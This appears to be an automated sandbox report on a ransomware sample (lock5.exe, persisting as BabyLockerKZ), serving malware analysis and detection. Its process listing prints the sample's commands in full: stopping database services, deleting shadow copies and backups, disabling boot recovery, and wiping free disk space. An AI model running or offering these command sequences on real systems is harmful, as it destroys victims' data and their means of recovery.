taskkill -f -im pg_ctl.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\taskkill.exe

taskkill -f -impostgres.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\net.exe

net stop MSSQLServerADHelper100

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\net.exe

net stop MSSQL$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\net.exe

net stop MSSQL$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\net.exe

net stop SQLAgent$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\net.exe

net stop SQLAgent$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\net.exe

net stop SQLBrowser

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLBrowser

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\net.exe

net stop REportServer$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop REportServer$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\net.exe

net stop SQLWriter

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLWriter

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Users\Admin\AppData\Local\Temp\lock5.exe

\\?\C:\Users\Admin\AppData\Local\Temp\lock5.exe -network

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\wbadmin.exe

wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cipher.exe

cipher /w:\\?\C:

C:\Windows\system32\cipher.exe

cipher /w:\\?\F:

C:\Windows\system32\cipher.exe

cipher /w:\\?\A:

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 06:02

Reported

2024-11-14 06:04

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

139s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2796 created 3424 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (170) files with added filename extension

ransomware

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\cipher.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\F: C:\Windows\SYSTEM32\cipher.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2796 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3120 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3120 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 4428 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4112 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4112 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 948 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 948 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1076 wrote to memory of 4952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1076 wrote to memory of 4952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 5052 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 5052 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4568 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4568 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3520 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2728 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 5100 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 5100 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1056 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1056 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1260 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 752 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 752 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2872 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2872 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3128 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3128 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2220 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2220 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
